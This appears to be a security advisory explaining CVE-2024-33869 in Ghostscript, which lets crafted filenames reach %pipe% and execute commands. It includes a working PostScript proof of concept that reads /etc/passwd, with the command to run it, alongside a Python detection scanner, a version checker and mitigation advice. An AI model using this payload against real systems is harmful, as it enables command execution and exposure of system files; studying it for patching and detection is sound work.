CVE-2024-33869 - Ghostscript Pre-10.03.1 Path Traversal & Command Execution Exploit Explained
Summary:
CVE-2024-33869 is a security vulnerability found in versions of Ghostscript before 10.03.1. Attackers can use specially crafted PostScript files to bypass security restrictions, leading to path traversal and even arbitrary command execution. This is possible due to how base/gpmisc.c reduces file paths, and how Ghostscript treats certain filename patterns like %pipe%. In this article, we break down exactly how the exploit works, show sample code, and explain what you can do about it.
What is Ghostscript?
Ghostscript is a popular software suite for processing PostScript (PS) and PDF files. Many Linux distributions ship it by default; it's used for everything from viewing PS files to converting PDFs.
- Affected versions: All Ghostscript versions before 10.03.1.
- Component: Path reduction logic in base/gpmisc.c.
- Impact: An attacker can execute shell commands by tricking Ghostscript into interpreting a malicious PostScript file.
A typical restriction in Ghostscript is blocking the %pipe% pseudo-device unless explicitly allowed, because it allows command execution. But the path resolution in Ghostscript can be fooled using directory traversal tricks (../) and crafted filenames like aa/../%pipe%command#.
Why is This Dangerous?
If Ghostscript processes files from untrusted users (like PDFs/PS files uploaded to a web service), an attacker can run arbitrary commands as the Ghostscript user. This can lead to full system compromise.
The Exploit: How It Works
Ghostscript allows file output and command execution (“pipes”) through magic filenames like %pipe%ls# (which runs the ls command).
Normally, Ghostscript blocks %pipe% use unless -dSAFER is off or the admin allows it. But the path reduction logic in base/gpmisc.c doesn’t properly prevent traversals like aa/../%pipe%command#. Ghostscript reduces the path and executes it as %pipe%command#—bypassing the security checks.
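The bypass works because a check that only looks at the start of the raw filename never sees the %pipe% prefix that emerges after the path is reduced. The following added Python example (not Ghostscript's code, and not part of the original article) models that defender-side mistake: a naive prefix check beside a check that first collapses ../ segments, plus a small scanner that applies the hardened check to every string literal in a PostScript file. The sample PostScript text is constructed for this example and reuses only the filename pattern the article already shows; posixpath.normpath stands in for Ghostscript's reducer.

```python
import posixpath
import re

# Ghostscript "magic" device prefix that grants command execution; the one the article discusses.
DANGEROUS_DEVICES = ("%pipe%",)

# Matches simple PostScript string literals of the form (...); nested parens are not handled.
STRING_LITERAL = re.compile(r"\(([^()]*)\)")

# Constructed sample input for this example, using the filename pattern from the article.
SAMPLE_PS = r"""%!
(aa/../%pipe%cat /etc/passwd#) (r) file
(output.txt) (w) file
"""


def reduce_path(path: str) -> str:
    """Collapse '.' and '..' segments, standing in for the path reducer in base/gpmisc.c.

    'aa/../%pipe%cat /etc/passwd#' reduces to '%pipe%cat /etc/passwd#'.
    """
    return posixpath.normpath(path)


def naive_check(path: str) -> bool:
    """The weak check: flag only when the raw string begins with a dangerous device prefix."""
    return path.startswith(DANGEROUS_DEVICES)


def hardened_check(path: str) -> bool:
    """Flag when a dangerous device prefix appears in the raw string or in its reduced form."""
    reduced = reduce_path(path)
    return any(device in path or device in reduced for device in DANGEROUS_DEVICES)


def scan_postscript(text: str) -> list:
    """Return every string literal in a PostScript document that the hardened check flags."""
    return [lit for lit in STRING_LITERAL.findall(text) if hardened_check(lit)]


if __name__ == "__main__":
    probe = "aa/../%pipe%cat /etc/passwd#"
    print("naive check flags it:   ", naive_check(probe))      # False: traversal hides the prefix
    print("hardened check flags it:", hardened_check(probe))   # True
    print("flagged literals:", scan_postscript(SAMPLE_PS))
```

The scanner is a triage heuristic for files sitting in an upload queue, not a substitute for patching: PostScript can build filenames at run time from pieces, so a content scan cannot prove a file harmless, but it does reliably catch the literal pattern this advisory describes.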
Sample Proof of Concept (PoC)
Here's a minimal PostScript file (exploit.ps) that demonstrates the issue, causing Ghostscript to write the contents of /etc/passwd to output.txt:
%!
% This writes the output of 'cat /etc/passwd' to a file called output.txt
(currentdirectory) dup
(aa/../%pipe%cat /etc/passwd#) (r) file
512 string readline pop
(output.txt) (w) file dup 3 1 roll writestring closefile closefile
quit
How to Run
gs -dSAFER exploit.ps
*If your Ghostscript is vulnerable, check output.txt—it'll contain the contents of /etc/passwd.*
Breaking it down:
- aa/../%pipe%cat /etc/passwd# – By using ../, the path reduction logic treats this as %pipe%cat /etc/passwd#.
- (r) file – Requests to open this “file”, which is really a command pipe.
- The command cat /etc/passwd is executed, and the result is written to output.txt.
Note:
Real-world attacks would use more covert or destructive commands, depending on the permissions Ghostscript runs under.
Original References & Further Reading
- Mitre CVE Entry
- Artifex Security Page
- Ghostscript commit fixing the bug
- Red Hat Security Advisory
Mitigation
- Update as soon as possible to Ghostscript 10.03.1 or later.
- If you can’t update immediately, do not let untrusted users upload or process PS/PDF files with Ghostscript.
- Restrict Ghostscript execution with OS sandboxing (like AppArmor/SELinux).
How to check your version
gs --version
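Comparing the printed version against 10.03.1 by hand is error-prone, so here is an added Python helper (not part of the original article) that parses the output of gs --version and decides whether the installed build predates the fix. The version strings in the examples are constructed; the tuple comparison assumes Ghostscript's usual major.minor.patch numbering, with the minor component zero-padded as in 10.02.1.

```python
import re
import subprocess

# First upstream release containing the fix, per the advisory.
FIXED_VERSION = (10, 3, 1)

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> tuple:
    """Extract the first dotted version number from `gs --version` (or `gs -v`) output."""
    match = VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no version number found in {text!r}")
    major, minor, patch = match.groups()
    # int() strips the zero padding Ghostscript uses, e.g. '10.02.1' -> (10, 2, 1).
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(version: tuple) -> bool:
    """True when the version is older than the first fixed upstream release."""
    return version < FIXED_VERSION


def installed_gs_version() -> tuple:
    """Run the real binary and parse its version; raises if gs is not installed."""
    result = subprocess.run(["gs", "--version"], capture_output=True, text=True, check=True)
    return parse_version(result.stdout)


if __name__ == "__main__":
    try:
        version = installed_gs_version()
    except (FileNotFoundError, subprocess.CalledProcessError) as exc:
        print("could not run gs:", exc)
    else:
        status = "VULNERABLE (update to 10.03.1 or later)" if is_vulnerable(version) else "fixed"
        print("Ghostscript", ".".join(map(str, version)), "->", status)
```

One caveat for distribution packages: vendors such as Red Hat often backport the fix without bumping the upstream version number, so a build reporting 10.02.1 may already be patched. Treat a "VULNERABLE" result from the version check as a prompt to consult your distribution's advisory, not as a final verdict.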
Final Thoughts
If you operate services (like print servers, PDF converters, or web apps) that process submitted PostScript or PDF files with Ghostscript, this vulnerability is critical. Attackers can escape the -dSAFER “sandbox” and execute arbitrary commands on your servers just by submitting a malicious file.
Patch now!
And always be careful about file inputs from external or untrusted sources.
Stay safe!
For more details and the latest updates, monitor Ghostscript’s official security page.
*This article is for educational purposes. Do not use these methods against systems you do not own or have permission to test.*
Timeline
Published on: 07/03/2024 19:15:03 UTC
Last modified on: 10/31/2024 18:35:11 UTC